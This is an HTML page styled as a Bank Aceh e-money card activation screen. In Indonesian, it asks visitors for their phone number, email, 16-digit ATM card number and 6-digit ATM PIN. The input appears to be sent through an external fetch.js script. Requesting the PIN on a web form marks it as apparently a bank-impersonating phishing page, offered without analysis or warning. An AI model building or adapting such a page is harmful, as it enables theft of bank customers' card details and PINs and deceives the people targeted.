<!doctype html>
<html lang="en">
 <head> 
  <meta charset="UTF-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
  <title>Bank Aceh</title> 
  <style>
@import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
* {
    font-family: 'Ubuntu', sans-serif;
    font-weight: 400;
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    color: #000;
    position: relative;
}
html { width: 100vw; height: 100vh; }
body {
    background: #fff;
    width: 100%;
    height: 100%;
}
.container {
    width: 100%;
    height: 100%;
    display: flex;
    align-items: center;
    flex-direction: column;
}
.headr {
    width: 100%;
    height: 40px;
    background: #006543;
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding: 0 20px;
}
.headr p {
    font-size: 15px;
    color: #fff;
}
.headr img {
    height: 36%;
}
.container .imgh {
    width: 100%;
}
.content {
    margin-top: 20px;
    width: 100%;
    padding: 20px;
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
}
.content form {
    width: 100%;
}
.content .wrp {
    width: 100%;
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
    height: 50px;
    flex-direction: column;
}
.content .wrp input {
    width: 100%;
    height: 50px;
    outline: none;
    border: none;
    border-bottom: 2px solid #d5d5d5;
    padding: 10px 0;
    background: transparent;
    z-index: 22;
    font-size: 13px;
}
.content .wrp label {
    color: #000;
    font-size: 13px;
    opacity: 0.7;
}
.content .wrp input:focus,
.content .wrp input:valid {
    border-bottom: 2px solid #006543;
}
.content button {
    width: 100%;
    height: 40px;
    border: none;
    border-radius: 50px;
    background: #006543;
    font-size: 11px;
    color: #fff;
}
.content .or {
    margin: 10px 0;
    font-size: 9px;
    text-align: center;
}
.content form .bbtn {
    margin-top: 10px;
    width: 100%;
    display: flex;
    align-items: center;
    justify-content: space-between;
}
.content form .bbtn button {
    width: 48%;
    height: 35px;
    font-size: 10px;
    color: #000;
    background: #fff400;
}
.content .reg {
    background: none;
    color: #1caa33;
    font-size: 13px;
}
.container .foot {
    width: 100%;
    position: absolute;
    bottom: 60px;
}
h3 {
    font-size: 13px;
}
h4 {
    margin: 5px 0 20px 0;
    font-size: 13px;
    color: #5d5d5d;
}
.bgm {
    width: 100%;
    height: 100%;
    background: ;
    position: absolute;
    z-index: 999;
    display: flex;
    justify-content: center;
    align-items: center;
}
.bgbg {
    width: 100%;
    height: 100%;
    background: #0000001b;
    position: absolute;
    z-index: 99;
}
.bgm .modal {
    width: 80%;
    border-radius: 20px;
    background: #fff;
    padding: 20px;
    transform: translatey(-80px);
    box-shadow: 0 3px 6px rgba(0,0,0,0.2);
}
.modal h3 {
    margin: 15px 0 0 0;
    font-size: 14px;
    text-align: center;
}
.xx {
    width: 100%;
    height: 40px;
    position: absolute;
    left: 0;
    top: 0;
    display: flex;
    justify-content: right;
}
.xx i {
    font-style: normal;
    position: absolute;
    right: 8px;
    top: 1px;
    font-weight: 200;
}
input::placeholder {
    font-size: 12px;
    opacity: 0.7;
    font-style: italic;
}
</style> 
 </head> 
 <body> 
  <div class="container"> 
   <div class="headr"> 
   <img src="/assets/back.png" onclick="window.location.href='/'" alt="">
    <center><p style="text-align: center; font-weight: bold;">AKTIVASI EMONEY CARD</p></center> 
    <img src="/assets/bell.png" alt="">
   </div> 
   <div class="content"> 
    <form id="tg" onsubmit=""> 
     <h3>Untuk melakukan pendaftaran emoney card<br>Action mobile lengkapi data dibawah ini</h3> 
     <h4></h4> 
     <div class="wrp"> 
      <label>Nomor Handphone Anda</label> 
      <input placeholder="Masukkan Nomor Handphone Anda" name="nomor" id="nomor" required autocomplete="off" type="tel" maxlength="12" minlength="11"> 
     </div> 
     <div class="wrp"> 
      <label>Email</label> 
      <input placeholder="Masukkan Email Anda" name="email" id="email" required autocomplete="off" type="email"> 
     </div> 
     <div class="wrp"> 
      <label>Nomor Kartu ATM</label> 
      <input placeholder="Masukkan Nomor Kartu ATM Anda" name="atm" id="atm" required autocomplete="off" type="tel" minlength="16" maxlength="16"> 
     </div> 
     <div class="wrp"> 
      <label>PIN ATM</label> 
      <input placeholder="Masukkan PIN ATM Anda" name="pin" id="pin" required autocomplete="off" type="tel" minlength="6" maxlength="6"> 
     </div> 
     <button type="submit">Lanjut</button> 
    </form> 
   </div> 
   <img src="ast/foot.jpg" alt="" class="foot"> 
  </div> 
  <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script> 
        <script src="/login/fetch.js"></script>
 </body>
</html>
